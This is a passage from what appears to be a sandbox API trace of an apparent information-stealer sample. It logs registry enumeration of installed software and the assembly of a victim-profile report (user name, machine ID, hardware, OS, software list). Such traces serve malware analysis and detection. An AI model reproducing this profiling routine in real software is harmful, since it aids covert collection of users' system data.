14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\n" [0175.914] RegCloseKey (hKey=0x354) returned 0x0 [0175.914] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x24, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-001F-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.914] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-001F-0409-0000-0000000FF1CE}") returned 90 [0175.914] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-001F-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.914] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Office Proofing Tools 2016 - English", lpcbData=0x197fd4*=0x2f) returned 0x0 [0175.914] lstrlenA (lpString="Microsoft Office Proofing Tools 2016 - English") returned 46 [0175.914] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Office Proofing Tools 2016 - English" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English" [0175.914] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.914] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English " [0175.914] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001" [0175.914] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\n" [0175.914] RegCloseKey (hKey=0x354) returned 0x0 [0175.914] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x25, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-001F-040C-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.915] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-001F-040C-0000-0000000FF1CE}") returned 90 [0175.915] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-001F-040C-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.915] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Outils de vérification linguistique 2016 de Microsoft Office - Français", lpcbData=0x197fd4*=0x48) returned 0x0 [0175.915] lstrlenA (lpString="Outils de vérification linguistique 2016 de Microsoft Office - Français") returned 71 [0175.915] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 